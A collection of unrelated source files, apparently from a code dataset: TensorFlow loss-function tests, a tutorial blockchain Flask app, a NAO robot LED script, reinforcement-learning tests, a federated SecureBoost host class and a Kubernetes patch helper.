lossfun_ph = general.lossfun(x_ph, alpha_ph, scale_ph)
loss_scaled = sess.run(lossfun_ph, {
x_ph: mult * x,
scale_ph: mult * scale,
alpha_ph: alpha
})
self.assertAllClose(loss, loss_scaled, atol=1e-4, rtol=1e-4)
def testLossIsScaleInvariantSingle(self):
self._loss_is_scale_invariant(np.float32)
def testLossIsScaleInvariantDouble(self):
self._loss_is_scale_invariant(np.float64)
def _alpha_equals_negative_infinity(self, float_dtype):
# Check that alpha == -Infinity reproduces Welsch aka Leclerc loss.
with self.session():
x = np.arange(-20, 20, 0.1, float_dtype)
alpha = float_dtype(-float('inf'))
scale = float_dtype(1.7)
# Our loss.
loss = general.lossfun(x, alpha, scale).eval()
# Welsch/Leclerc loss.
loss_true = (1. - tf.math.exp(-0.5 * tf.square(x / scale))).eval()
self._assert_all_close_according_to_type(loss, loss_true)
def testAlphaEqualsNegativeInfinitySingle(self):
self._alpha_equals_negative_infinity(np.float32)
def testAlphaEqualsNegativeInfinityDouble(self):
self._alpha_equals_negative_infinity(np.float64)
def _alpha_equals_negative_two(self, float_dtype):
# Check that alpha == -2 reproduces Geman-McClure loss.
with self.session():
x = np.arange(-20, 20, 0.1, float_dtype)
alpha = float_dtype(-2.)
scale = float_dtype(1.7)
# Our loss.
loss = general.lossfun(x, alpha, scale).eval()
# Geman-McClure loss.
loss_true = (
2. * tf.square(x / scale) / (tf.square(x / scale) + 4.)).eval()
self._assert_all_close_according_to_type(loss, loss_true)
def testAlphaEqualsNegativeTwoSingle(self):
self._alpha_equals_negative_two(np.float32)
def testAlphaEqualsNegativeTwoDouble(self):
self._alpha_equals_negative_two(np.float64)
def _alpha_equals_zero(self, float_dtype):
# Check that alpha == 0 reproduces Cauchy aka Lorentzian loss.
with self.session():
x = np.arange(-20, 20, 0.1, float_dtype)
alpha = float_dtype(0.)
scale = float_dtype(1.7)
# Our loss.
loss = general.lossfun(x, alpha, scale).eval()
# Cauchy/Lorentzian loss.
loss_true = (tf.log(0.5 * tf.square(x / scale) + 1.)).eval()
self._assert_all_close_according_to_type(loss, loss_true)
def testAlphaEqualsZeroSingle(self):
self._alpha_equals_zero(np.float32)
def testAlphaEqualsZeroDouble(self):
self._alpha_equals_zero(np.float64)
def _alpha_equals_one(self, float_dtype):
# Check that alpha == 1 reproduces Charbonnier aka pseudo-Huber loss.
with self.session():
x = np.arange(-20, 20, 0.1, float_dtype)
alpha = float_dtype(1.)
scale = float_dtype(1.7)
# Our loss.
loss = general.lossfun(x, alpha, scale).eval()
# Charbonnier loss.
loss_true = (tf.sqrt(tf.square(x / scale) + 1.) - 1.).eval()
self._assert_all_close_according_to_type(loss, loss_true)
def testAlphaEqualsOneSingle(self):
self._alpha_equals_one(np.float32)
def testAlphaEqualsOneDouble(self):
self._alpha_equals_one(np.float64)
def _alpha_equals_two(self, float_dtype):
# Check that alpha == 2 reproduces L2 loss.
with self.session():
x = np.arange(-20, 20, 0.1, float_dtype)
alpha = float_dtype(2.)
scale = float_dtype(1.7)
# Our loss.
loss = general.lossfun(x, alpha, scale).eval()
# L2 Loss.
loss_true = (0.5 * tf.square(x / scale)).eval()
self._assert_all_close_according_to_type(loss, loss_true)
def testAlphaEqualsTwoSingle(self):
self._alpha_equals_two(np.float32)
def testAlphaEqualsTwoDouble(self):
self._alpha_equals_two(np.float64)
def _alpha_equals_four(self, float_dtype):
# Check that alpha == 4 reproduces a quartic.
with self.session():
x = np.arange(-20, 20, 0.1, float_dtype)
alpha = float_dtype(4.)
scale = float_dtype(1.7)
# Our loss.
loss = general.lossfun(x, alpha, scale).eval()
# The true loss.
loss_true = (tf.square(tf.square(x / scale)) / 8. +
tf.square(x / scale) / 2.).eval()
self._assert_all_close_according_to_type(loss, loss_true)
def testAlphaEqualsFourSingle(self):
self._alpha_equals_four(np.float32)
def testAlphaEqualsFourDouble(self):
self._alpha_equals_four(np.float64)
def _alpha_equals_infinity(self, float_dtype):
# Check that alpha == Infinity takes the correct form.
with self.session():
x = np.arange(-20, 20, 0.1, float_dtype)
alpha = float_dtype(float('inf'))
scale = float_dtype(1.7)
# Our loss.
loss = general.lossfun(x, alpha, scale).eval()
# The true loss.
loss_true = (tf.math.exp(0.5 * tf.square(x / scale)) - 1.).eval()
self._assert_all_close_according_to_type(loss, loss_true)
def testAlphaEqualsInfinitySingle(self):
self._alpha_equals_infinity(np.float32)
def testAlphaEqualsInfinityDouble(self):
self._alpha_equals_infinity(np.float64)
def _approximate_loss_is_accurate(self, float_dtype):
# Check that the approximate loss (lossfun() with epsilon=1e-6) reasonably
# approximates the true loss (lossfun() with epsilon=0.) for a range of
# values of alpha (skipping alpha=0, where the approximation is poor).
with self.session():
x = np.arange(-10, 10, 0.1, float_dtype)
scale = float_dtype(1.7)
for alpha in [-4, -2, -0.2, -0.01, 0.01, 0.2, 1, 1.99, 2, 2.01, 4]:
alpha = float_dtype(alpha)
loss = general.lossfun(x, alpha, scale).eval()
loss_approx = general.lossfun(x, alpha, scale, approximate=True).eval()
self.assertAllClose(
loss, loss_approx, rtol=1e-5, atol=1e-4, msg='alpha=%g' % (alpha))
def testApproximateLossIsAccurateSingle(self):
self._approximate_loss_is_accurate(np.float32)
def testApproximateLossIsAccurateDouble(self):
self._approximate_loss_is_accurate(np.float64)
def _loss_and_gradients_are_finite(self, float_dtype):
# Test that the loss and its approximation both give finite losses and
# derivatives everywhere that they should for a wide range of values.
for approximate in [False, True]:
with self.session() as sess:
num_samples = 100000
# Normally distributed inputs.
x = float_dtype(np.random.normal(size=num_samples))
# Uniformly distributed values in (-16, 3), quantized to the nearest
# 0.1 to ensure that we hit the special cases at 0, 2.
alpha = float_dtype(
np.round(np.random.uniform(-16, 3, num_samples) * 10) / 10.)
# Random log-normally distributed values in approx (1e-5, 100000):
scale = float_dtype(
np.exp(np.random.normal(size=num_samples) * 4.) + 1e-5)
# Compute the loss and its derivative with respect to all three inputs.
x_ph = tf.placeholder(x.dtype, num_samples)
alpha_ph = tf.placeholder(alpha.dtype, num_samples)
scale_ph = tf.placeholder(scale.dtype, num_samples)
lossfun_ph = general.lossfun(
x_ph, alpha_ph, scale_ph, approximate=approximate)
loss, (d_x, d_alpha, d_scale) = sess.run(
(lossfun_ph,
tf.gradients(
tf.reduce_sum(lossfun_ph), (x_ph, alpha_ph, scale_ph))), {
x_ph: x,
scale_ph: scale,
alpha_ph: alpha
})
for v in [loss, d_x, d_alpha, d_scale]:
self.assertTrue(np.all(np.isfinite(v)))
def testLossAndGradientsAreFiniteSingle(self):
self._loss_and_gradients_are_finite(np.float32)
def testLossAndGradientsAreFiniteDouble(self):
self._loss_and_gradients_are_finite(np.float64)
def _gradient_matches_finite_differences(self, float_dtype):
# Test that the loss and its approximation both return gradients that are
# close to the numerical gradient from finite differences, with forward
# differencing. Returning correct gradients is TensorFlow's job, so this is
# just an aggressive sanity check in case some implementation detail causes
# gradients to incorrectly go to zero due to quantization or stop_gradients
# in some op that is used by the loss.
for approximate in [False, True]:
with self.session() as sess:
num_samples = 100000
# Normally distributed inputs.
x = float_dtype(np.random.normal(size=num_samples))
# Uniformly distributed values in (-16, 3), quantized to the nearest
# 0.1 and then shifted by 0.05 so that we avoid the special cases at
# 0 and 2 where the analytical gradient won't match finite differences.
alpha = float_dtype(
np.round(np.random.uniform(-16, 3, num_samples) * 10) / 10. + 0.05)
# Random uniformly distributed values in [0.5, 1.5]
scale = float_dtype(np.random.uniform(0.5, 1.5, num_samples))
# Compute the loss and its derivative with respect to all three inputs.
x_ph = tf.placeholder(x.dtype, num_samples)
alpha_ph = tf.placeholder(alpha.dtype, num_samples)
scale_ph = tf.placeholder(scale.dtype, num_samples)
lossfun_ph = general.lossfun(
x_ph, alpha_ph, scale_ph, approximate=approximate)
loss, (d_x, d_alpha, d_scale) = sess.run(
(lossfun_ph,
tf.gradients(
tf.reduce_sum(lossfun_ph), (x_ph, alpha_ph, scale_ph))), {
x_ph: x,
alpha_ph: alpha,
scale_ph: scale
})
step_size = float_dtype(1e-3)
# Assert that the 95th percentile of errors is <= 1e-2.
def assert_percentile_close(v1, v2):
self.assertLessEqual(np.percentile(np.abs(v1 - v2), 95), 1e-2)
n_x = (sess.run(lossfun_ph, {
x_ph: x + step_size,
alpha_ph: alpha,
scale_ph: scale
}) - loss) / step_size
assert_percentile_close(n_x, d_x)
n_alpha = (sess.run(lossfun_ph, {
x_ph: x,
alpha_ph: alpha + step_size,
scale_ph: scale
}) - loss) / step_size
assert_percentile_close(n_alpha, d_alpha)
n_scale = (sess.run(lossfun_ph, {
x_ph: x,
alpha_ph: alpha,
scale_ph: scale + step_size
}) - loss) / step_size
assert_percentile_close(n_scale, d_scale)
def testGradientMatchesFiniteDifferencesSingle(self):
self._gradient_matches_finite_differences(np.float32)
def testGradientMatchesFiniteDifferencesDouble(self):
self._gradient_matches_finite_differences(np.float64)
if __name__ == '__main__':
tf.test.main()
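# --- Illustrative usage sketch (an assumption, not part of the original test file) ---
# The tests above exercise general.lossfun(x, alpha, scale); a typical TF1-style
# call on a batch of residuals, with per-sample shape and scale tensors, might
# look like the following (the tensor names here are hypothetical):
#
# x_ph = tf.placeholder(tf.float32, [None])
# alpha_t = tf.ones_like(x_ph)          # alpha = 1 -> Charbonnier-like behaviour
# scale_t = 0.5 * tf.ones_like(x_ph)
# per_sample_loss = general.lossfun(x_ph, alpha_t, scale_t)
# total_loss = tf.reduce_mean(per_sample_loss)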
|
the-stack_106_19097
|
from crypt import methods
import datetime
import hashlib
import json
from flask import Flask, jsonify, request
import requests
from uuid import uuid4
from urllib.parse import urlparse
# CREATING A BLOCKCHAIN
class Blockchain:
def __init__(self) -> None:
self.chain = []
self.transactions = []
self.create_block(proof=1, previous_hash='0')
# The set of nodes where our blockchain will operate. There is no
# ordering, which is why a set is used instead of a list
self.nodes = set()
def create_block(self, proof: int, previous_hash: str):
block = {
'index': len(self.chain)+1,
'timestamp': str(datetime.datetime.now()),
'proof': proof,
'previous_hash': previous_hash,
'transactions': self.transactions
}
self.transactions = []
self.chain.append(block)
return block
def get_previous_block(self):
return self.chain[-1]
def proof_of_work(self, previous_proof):
new_proof = 1
check_proof = False
while check_proof is False:
hash_operation = hashlib.sha256(str(new_proof**3-previous_proof**2+(new_proof**(1/2)-previous_proof**(1/2))).encode()).hexdigest()
if hash_operation[:4] == '0000':
check_proof = True
else:
new_proof += 1
return new_proof
def hash(self, block):
"""
Given a block, return the hash that corresponds to it
"""
encoded_block = json.dumps(block, sort_keys=True).encode()
return hashlib.sha256(encoded_block).hexdigest()
def is_chain_valid(self, chain):
"""
Starting from block 0 (Genesis), check that every
following block is valid
"""
previous_block = chain[0]
block_index = 1
# While loop to iterate from the first block to the last one
while block_index < len(chain):
block = chain[block_index]
# Compare whether the previous_hash of the current block equals the
# hash of the previous block
if block.get('previous_hash') != self.hash(previous_block):
return False
previous_proof = previous_block.get('proof')
proof = block.get('proof')
hash_operation = hashlib.sha256(str(proof**3-previous_proof**2+(proof**(1/2)-previous_proof**(1/2))).encode()).hexdigest()
# Check that the proof-of-work hash linking the current block and
# the previous one is correct
if hash_operation[:4] != '0000':
return False
# Update the previous block to the current one and move the index
# forward by 1 to check the next block
previous_block = block
block_index += 1
return True
def add_transaction(self, sender, receiver, amount):
"""
sender: Sender of the transaction
receiver: Receiver of the transaction
amount: Amount of the transaction
Returns the index of the block that these transactions
are being collected for
"""
self.transactions.append({
'sender': sender,
'receiver': receiver,
'amount': amount
})
return self.get_previous_block()['index'] + 1
def add_node (self, address):
"""
Add a node to the list of nodes, given its address
address: address of the new node
"""
# Create a urlparse result object that exposes several attributes
# of the URL
parsed_url = urlparse(address)
# Keep only the network location; the http scheme and any arguments
# the URL may have are dropped
self.nodes.add(parsed_url.netloc)
def replace_chain(self):
"""
Used when a miner has mined a block, so the current chain is longer
than the previous one. Every other miner must then replace its
chain with the new resulting one
"""
network = self.nodes
longest_chain = None
max_length = len(self.chain)
# Walk the whole network and ask each miner for the length of
# its chain
for node in network:
response = requests.get(f'http://{node}/get_chain')
if response.status_code == 200:
length = response.json()['length']
chain = response.json()['chain']
# If the length of a chain exceeds the current maximum and the
# chain is valid, update it
if length > max_length and self.is_chain_valid(chain):
max_length = length
longest_chain = chain
# If a chain longer than the current one was found by the end of
# the loop, replace it and return True because the chain has been
# replaced
if longest_chain:
self.chain = longest_chain
return True
# Otherwise return False, since the chain would not have been
# replaced
return False
# MINING BLOCKS OF THE CHAIN
# Create the web application
app = Flask(__name__)
# Create the node address on port 5000
node_address = str(uuid4()).replace('-','')
# Create an instance of the Blockchain class
blockchain = Blockchain()
# Mine a new block
@app.route('/mine_block', methods=['GET'])
def mine_block():
previous_block = blockchain.get_previous_block()
previous_proof = previous_block.get('proof')
proof = blockchain.proof_of_work(previous_proof)
previous_hash = blockchain.hash(previous_block)
blockchain.add_transaction(sender=node_address,
receiver='Javier',
amount=1)
block = blockchain.create_block(proof, previous_hash)
response = {'message': 'Congrats. You have mined a new block',
'index': block.get('index'),
'timestamp': block.get('timestamp'),
'proof': block.get('proof'),
'previous_hash': block.get('previous_hash'),
'transactions': block.get('transactions')
}
return jsonify(response), 200
# Get the full blockchain
@app.route('/get_chain', methods=['GET'])
def get_chain():
response = {'chain': blockchain.chain,
'length': len(blockchain.chain)
}
return jsonify(response), 200
# Check whether the blockchain is valid
@app.route('/is_valid', methods=['GET'])
def is_valid():
valid = blockchain.is_chain_valid(blockchain.chain)
if valid:
message = 'The blockchain is valid'
else:
message = 'Ups. This blockchain is not valid'
response = {'message': message}
return jsonify(response), 200
@app.route('/add_transaction', methods=['POST'])
def add_transaction():
json = request.get_json()
transaction_keys = ['sender', 'receiver', 'amount']
if not all(key in json for key in transaction_keys):
return 'Incomplete transaction. Missing elements', 400
index = blockchain.add_transaction(sender=json['sender'],
receiver=json['receiver'],
amount=json['amount']
)
response = {'message': f'The transaction will be added to block {index}'}
return jsonify(response), 201
# DECENTRALIZING THE BLOCKCHAIN
# To turn the blockchain into a cryptocurrency we have to add:
# - A field for the transactions
# - A field for the consensus
# Connect new nodes
@app.route('/connect_node', methods=['POST'])
def connect_node():
"""
A list of one or more nodes to register is passed via POST
"""
json = request.get_json()
nodes = json.get('nodes')
if nodes is None or len(nodes) == 0:
return 'No node was added', 400
# If there are nodes to add, register them one by one
for node in nodes:
blockchain.add_node(address=node)
response = {'message': 'Nodes connected successfully',
'total_nodes': list(blockchain.nodes)}
return jsonify(response), 201
# Replace the chain if a new, longer chain exists
@app.route('/replace_chain', methods=['GET'])
def replace_chain():
is_chain_replaced = blockchain.replace_chain()
if is_chain_replaced:
message = 'The chain has been updated'
else:
message = 'The chain is okay, it is not necessary to update it'
response = {'message': message,
'chain': blockchain.chain}
return jsonify(response), 200
# Run the app
app.run(host='0.0.0.0', port=5000)
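# --- Illustrative client sketch (an assumption, not part of the original file) ---
# A minimal example of how the endpoints above could be exercised from another
# process once this app is running locally; the node URLs and payload values are
# hypothetical, and the JSON keys mirror connect_node()/add_transaction() above.
#
# import requests
#
# requests.post('http://127.0.0.1:5000/connect_node',
#               json={'nodes': ['http://127.0.0.1:5001']})
# requests.post('http://127.0.0.1:5000/add_transaction',
#               json={'sender': 'Alice', 'receiver': 'Bob', 'amount': 10})
# requests.get('http://127.0.0.1:5000/mine_block')
# requests.get('http://127.0.0.1:5000/replace_chain')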
|
the-stack_106_19099
|
from naoqi import ALProxy
import sys
import math
import random
import time
args = sys.argv
IP = args[1]
PORT = int(args[2])
try:
leds = ALProxy("ALLeds", IP, PORT)
except Exception as e:
quit()
def onLed(group, r, g, b, duration):
# file:///Applications/Choregraphe.app/Contents/Resources/share/doc/naoqi/sensors/alleds.html
leds.fadeRGB(group, r, g, b, duration)
pass
onLed('RightFaceLeds', 0, 0, 0, 0.0)
onLed('LeftFaceLeds', 0, 0, 0, 0.0)
onLed('ChestLeds', 0, 0, 0, 0.0)
onLed('RightEarLeds', 0, 0, 0, 0.0)
onLed('LeftEarLeds', 0, 0, 0, 0.0)
# time.sleep(0.5)
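# --- Illustrative invocation (an assumption, not part of the original file) ---
# The script expects the robot's address and NAOqi port as positional
# arguments, e.g.:
#
#   python turn_off_leds.py 192.168.1.10 9559
#
# (the script name and address are hypothetical; 9559 is the usual NAOqi port).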
|
the-stack_106_19101
|
# Copyright 2020,2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pytest
import nnabla as nn
import nnabla_rl.algorithms as A
import nnabla_rl.environments as E
from nnabla_rl.replay_buffer import ReplayBuffer
class TestCategoricalDQN(object):
def setup_method(self, method):
nn.clear_parameters()
def test_algorithm_name(self):
dummy_env = E.DummyDiscreteImg()
categorical_dqn = A.CategoricalDQN(dummy_env)
assert categorical_dqn.__name__ == 'CategoricalDQN'
def test_continuous_action_env_unsupported(self):
'''
Check that error occurs when training on continuous action env
'''
dummy_env = E.DummyContinuous()
config = A.CategoricalDQNConfig()
with pytest.raises(Exception):
A.CategoricalDQN(dummy_env, config=config)
def test_run_online_training(self):
'''
Check that no error occurs when calling online training
'''
dummy_env = E.DummyDiscreteImg()
config = A.CategoricalDQNConfig()
config.start_timesteps = 5
config.batch_size = 5
config.learner_update_frequency = 1
config.target_update_frequency = 1
categorical_dqn = A.CategoricalDQN(dummy_env, config=config)
categorical_dqn.train_online(dummy_env, total_iterations=10)
def test_run_online_training_multistep(self):
'''
Check that no error occurs when calling online training
'''
dummy_env = E.DummyDiscreteImg()
config = A.CategoricalDQNConfig()
config.num_steps = 2
config.start_timesteps = 5
config.batch_size = 5
config.learner_update_frequency = 1
config.target_update_frequency = 1
categorical_dqn = A.CategoricalDQN(dummy_env, config=config)
categorical_dqn.train_online(dummy_env, total_iterations=10)
def test_run_offline_training(self):
'''
Check that no error occurs when calling offline training
'''
batch_size = 5
dummy_env = E.DummyDiscreteImg()
config = A.CategoricalDQNConfig(batch_size=batch_size)
categorical_dqn = A.CategoricalDQN(dummy_env, config=config)
experiences = generate_dummy_experiences(dummy_env, batch_size)
buffer = ReplayBuffer()
buffer.append_all(experiences)
categorical_dqn.train_offline(buffer, total_iterations=10)
def test_compute_eval_action(self):
dummy_env = E.DummyDiscreteImg()
categorical_dqn = A.CategoricalDQN(dummy_env)
state = dummy_env.reset()
state = np.float32(state)
action = categorical_dqn.compute_eval_action(state)
assert action.shape == (1, )
def test_latest_iteration_state(self):
'''
Check that latest iteration state has the keys and values we expected
'''
dummy_env = E.DummyDiscreteImg()
categorical_dqn = A.CategoricalDQN(dummy_env)
categorical_dqn._model_trainer_state = {'cross_entropy_loss': 0., 'td_errors': np.array([0., 1.])}
latest_iteration_state = categorical_dqn.latest_iteration_state
assert 'cross_entropy_loss' in latest_iteration_state['scalar']
assert 'td_errors' in latest_iteration_state['histogram']
assert latest_iteration_state['scalar']['cross_entropy_loss'] == 0.
assert np.allclose(latest_iteration_state['histogram']['td_errors'], np.array([0., 1.]))
if __name__ == "__main__":
from testing_utils import generate_dummy_experiences
pytest.main()
else:
from ..testing_utils import generate_dummy_experiences
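# --- Illustrative usage sketch (an assumption, not part of the original tests) ---
# Outside of the dummy environments used above, the same API would typically be
# driven against a real discrete-action env; the config values below are
# hypothetical:
#
# import nnabla_rl.algorithms as A
#
# config = A.CategoricalDQNConfig(batch_size=32)
# config.start_timesteps = 1000
# categorical_dqn = A.CategoricalDQN(env, config=config)
# categorical_dqn.train_online(env, total_iterations=100000)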
|
the-stack_106_19103
|
from typing import List
import functools
import copy
import numpy as np
from scipy import sparse as sp
from federatedml.util import LOGGER
from federatedml.util import consts
from federatedml.protobuf.generated.boosting_tree_model_meta_pb2 import BoostingTreeModelMeta
from federatedml.protobuf.generated.boosting_tree_model_meta_pb2 import QuantileMeta
from federatedml.protobuf.generated.boosting_tree_model_param_pb2 import BoostingTreeModelParam
from federatedml.ensemble.boosting.boosting_core import HeteroBoostingHost
from federatedml.param.boosting_param import HeteroSecureBoostParam, DecisionTreeParam
from federatedml.ensemble.basic_algorithms import HeteroDecisionTreeHost
from federatedml.transfer_variable.transfer_class.hetero_secure_boosting_predict_transfer_variable import \
HeteroSecureBoostTransferVariable
from federatedml.util.io_check import assert_io_num_rows_equal
from federatedml.util.anonymous_generator import generate_anonymous
from federatedml.feature.fate_element_type import NoneType
class HeteroSecureBoostingTreeHost(HeteroBoostingHost):
def __init__(self):
super(HeteroSecureBoostingTreeHost, self).__init__()
self.use_missing = False
self.zero_as_missing = False
self.cur_epoch_idx = -1
self.grad_and_hess = None
self.tree_param = DecisionTreeParam() # decision tree param
self.model_param = HeteroSecureBoostParam()
self.complete_secure = False
self.model_name = 'HeteroSecureBoost'
self.enable_goss = False
self.cipher_compressing = False
self.max_sample_weight = None
self.round_decimal = None
self.new_ver = True
# for fast hist
self.sparse_opt_para = False
self.run_sparse_opt = False
self.has_transformed_data = False
self.data_bin_dense = None
self.predict_transfer_inst = HeteroSecureBoostTransferVariable()
def _init_model(self, param: HeteroSecureBoostParam):
super(HeteroSecureBoostingTreeHost, self)._init_model(param)
self.tree_param = param.tree_param
self.use_missing = param.use_missing
self.enable_goss = param.run_goss
self.zero_as_missing = param.zero_as_missing
self.complete_secure = param.complete_secure
self.sparse_opt_para = param.sparse_optimization
self.round_decimal = param.cipher_compress_error
self.new_ver = param.new_ver
if self.use_missing:
self.tree_param.use_missing = self.use_missing
self.tree_param.zero_as_missing = self.zero_as_missing
@staticmethod
def sparse_to_array(data, feature_sparse_point_array, use_missing, zero_as_missing):
new_data = copy.deepcopy(data)
new_feature_sparse_point_array = copy.deepcopy(feature_sparse_point_array)
for k, v in data.features.get_all_data():
if v == NoneType():
value = -1
else:
value = v
new_feature_sparse_point_array[k] = value
# as most sparse point is bin-0
# when mark it as a missing value (-1), offset it to make it sparse
if not use_missing or (use_missing and not zero_as_missing):
offset = 0
else:
offset = 1
new_data.features = sp.csc_matrix(np.array(new_feature_sparse_point_array) + offset)
return new_data
def check_run_sp_opt(self):
# if run fast hist, generate dense d_dtable and set related variables
self.run_sparse_opt = (self.encrypt_param.method.lower() == consts.ITERATIVEAFFINE.lower()) and \
self.sparse_opt_para
if self.run_sparse_opt:
LOGGER.info('host is running fast histogram mode')
# for fast hist computation, data preparation
if self.run_sparse_opt and not self.has_transformed_data:
# start data transformation for fast histogram mode
if not self.use_missing or (self.use_missing and not self.zero_as_missing):
feature_sparse_point_array = [self.bin_sparse_points[i] for i in range(len(self.bin_sparse_points))]
else:
feature_sparse_point_array = [-1 for i in range(len(self.bin_sparse_points))]
sparse_to_array = functools.partial(
HeteroSecureBoostingTreeHost.sparse_to_array,
feature_sparse_point_array=feature_sparse_point_array,
use_missing=self.use_missing,
zero_as_missing=self.zero_as_missing
)
self.data_bin_dense = self.data_bin.mapValues(sparse_to_array)
self.has_transformed_data = True
def fit_a_booster(self, epoch_idx: int, booster_dim: int):
self.check_run_sp_opt()
tree = HeteroDecisionTreeHost(tree_param=self.tree_param)
tree.init(flowid=self.generate_flowid(epoch_idx, booster_dim),
valid_features=self.sample_valid_features(),
data_bin=self.data_bin, bin_split_points=self.bin_split_points,
bin_sparse_points=self.bin_sparse_points,
run_sprase_opt=self.run_sparse_opt,
data_bin_dense=self.data_bin_dense,
runtime_idx=self.component_properties.local_partyid,
goss_subsample=self.enable_goss,
bin_num=self.bin_num,
complete_secure=True if (self.complete_secure and epoch_idx == 0) else False,
cipher_compressing=self.round_decimal is not None,
round_decimal=self.round_decimal,
new_ver=self.new_ver
)
tree.fit()
return tree
def load_booster(self, model_meta, model_param, epoch_idx, booster_idx):
tree = HeteroDecisionTreeHost(self.tree_param)
tree.load_model(model_meta, model_param)
tree.set_flowid(self.generate_flowid(epoch_idx, booster_idx))
tree.set_runtime_idx(self.component_properties.local_partyid)
return tree
def generate_summary(self) -> dict:
summary = {'best_iteration': self.validation_strategy.best_iteration, 'is_converged': self.is_converged}
LOGGER.debug('summary is {}'.format(summary))
return summary
@staticmethod
def traverse_a_tree(tree: HeteroDecisionTreeHost, sample, cur_node_idx):
nid, _ = tree.traverse_tree(predict_state=(cur_node_idx, -1), data_inst=sample,
decoder=tree.decode, split_maskdict=tree.split_maskdict,
missing_dir_maskdict=tree.missing_dir_maskdict, sitename=tree.sitename,
tree_=tree.tree_node, zero_as_missing=tree.zero_as_missing,
use_missing=tree.use_missing)
return nid, _
@staticmethod
def traverse_trees(leaf_pos, sample, trees: List[HeteroDecisionTreeHost]):
for t_idx, tree in enumerate(trees):
cur_node_idx = leaf_pos['node_pos'][t_idx]
# idx is set as -1 when a sample reaches leaf
if cur_node_idx == -1:
continue
nid, _ = HeteroSecureBoostingTreeHost.traverse_a_tree(tree, sample, cur_node_idx)
leaf_pos['node_pos'][t_idx] = nid
return leaf_pos
def boosting_fast_predict(self, data_inst, trees: List[HeteroDecisionTreeHost]):
comm_round = 0
traverse_func = functools.partial(self.traverse_trees, trees=trees)
while True:
LOGGER.debug('cur predict round is {}'.format(comm_round))
stop_flag = self.predict_transfer_inst.predict_stop_flag.get(idx=0, suffix=(comm_round, ))
if stop_flag:
break
guest_node_pos = self.predict_transfer_inst.guest_predict_data.get(idx=0, suffix=(comm_round, ))
host_node_pos = guest_node_pos.join(data_inst, traverse_func)
if guest_node_pos.count() != host_node_pos.count():
raise ValueError('sample count mismatch: guest table {}, host table {}'.format(guest_node_pos.count(),
host_node_pos.count()))
self.predict_transfer_inst.host_predict_data.remote(host_node_pos, idx=-1, suffix=(comm_round, ))
comm_round += 1
@assert_io_num_rows_equal
def predict(self, data_inst):
LOGGER.info('running prediction')
processed_data = self.data_and_header_alignment(data_inst)
predict_start_round = self.sync_predict_start_round()
rounds = len(self.boosting_model_list) // self.booster_dim
trees = []
for idx in range(predict_start_round, rounds):
for booster_idx in range(self.booster_dim):
tree = self.load_booster(self.booster_meta,
self.boosting_model_list[idx * self.booster_dim + booster_idx],
idx, booster_idx)
trees.append(tree)
if len(trees) == 0:
LOGGER.info('no tree for predicting, prediction done')
return
self.boosting_fast_predict(processed_data, trees=trees)
def get_model_meta(self):
model_meta = BoostingTreeModelMeta()
model_meta.tree_meta.CopyFrom(self.booster_meta)
model_meta.num_trees = self.boosting_round
model_meta.quantile_meta.CopyFrom(QuantileMeta(bin_num=self.bin_num))
meta_name = "HeteroSecureBoostingTreeHostMeta"
return meta_name, model_meta
def get_model_param(self):
model_param = BoostingTreeModelParam()
model_param.tree_num = len(self.boosting_model_list)
model_param.tree_dim = self.booster_dim
model_param.trees_.extend(self.boosting_model_list)
anonymous_name_mapping = {}
party_id = self.component_properties.local_partyid
for fid, name in self.feature_name_fid_mapping.items():
anonymous_name_mapping[generate_anonymous(fid, role=consts.HOST, party_id=party_id,)] = name
model_param.anonymous_name_mapping.update(anonymous_name_mapping)
model_param.feature_name_fid_mapping.update(self.feature_name_fid_mapping)
model_param.model_name = consts.HETERO_SBT
model_param.best_iteration = -1 if self.validation_strategy is None else self.validation_strategy.best_iteration
param_name = "HeteroSecureBoostingTreeHostParam"
return param_name, model_param
def set_model_meta(self, model_meta):
self.booster_meta = model_meta.tree_meta
self.boosting_round = model_meta.num_trees
self.bin_num = model_meta.quantile_meta.bin_num
def set_model_param(self, model_param):
self.boosting_model_list = list(model_param.trees_)
self.booster_dim = model_param.tree_dim
self.feature_name_fid_mapping.update(model_param.feature_name_fid_mapping)
|
the-stack_106_19104
|
from typing import Optional, cast
import aiohttp
from kopf.clients import auth
from kopf.clients import discovery
from kopf.structs import bodies
from kopf.structs import patches
from kopf.structs import resources
@auth.reauthenticated_request
async def patch_obj(
*,
resource: resources.Resource,
patch: patches.Patch,
namespace: Optional[str] = None,
name: Optional[str] = None,
body: Optional[bodies.Body] = None,
context: Optional[auth.APIContext] = None, # injected by the decorator
) -> None:
"""
Patch a resource of specific kind.
Either the namespace+name should be specified, or the body,
which is used only to get namespace+name identifiers.
Unlike the object listing, the namespaced call is always
used for the namespaced resources, even if the operator serves
the whole cluster (i.e. is not namespace-restricted).
"""
if context is None:
raise RuntimeError("API instance is not injected by the decorator.")
if body is not None and (name is not None or namespace is not None):
raise TypeError("Either body, or name+namespace can be specified. Got both.")
namespace = body.get('metadata', {}).get('namespace') if body is not None else namespace
name = body.get('metadata', {}).get('name') if body is not None else name
is_namespaced = await discovery.is_namespaced(resource=resource, context=context)
namespace = namespace if is_namespaced else None
if body is None:
body = cast(bodies.Body, {'metadata': {'name': name}})
if namespace is not None:
body['metadata']['namespace'] = namespace
as_subresource = await discovery.is_status_subresource(resource=resource, context=context)
body_patch = dict(patch) # shallow: for mutation of the top-level keys below.
status_patch = body_patch.pop('status', None) if as_subresource else None
try:
if body_patch:
await context.session.patch(
url=resource.get_url(server=context.server, namespace=namespace, name=name),
headers={'Content-Type': 'application/merge-patch+json'},
json=body_patch,
raise_for_status=True,
)
if status_patch:
await context.session.patch(
url=resource.get_url(server=context.server, namespace=namespace, name=name,
subresource='status' if as_subresource else None),
headers={'Content-Type': 'application/merge-patch+json'},
json={'status': status_patch},
raise_for_status=True,
)
except aiohttp.ClientResponseError as e:
if e.status == 404:
pass
else:
raise
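# --- Illustrative usage sketch (an assumption, not part of kopf itself) ---
# patch_obj() above would typically be awaited by kopf's internal machinery with
# a Patch (a dict-like structure) destined for a specific resource, roughly:
#
#     patch = patches.Patch({'status': {'phase': 'Done'}})
#     await patch_obj(resource=some_resource, patch=patch,
#                     namespace='default', name='kopf-example-1')
#
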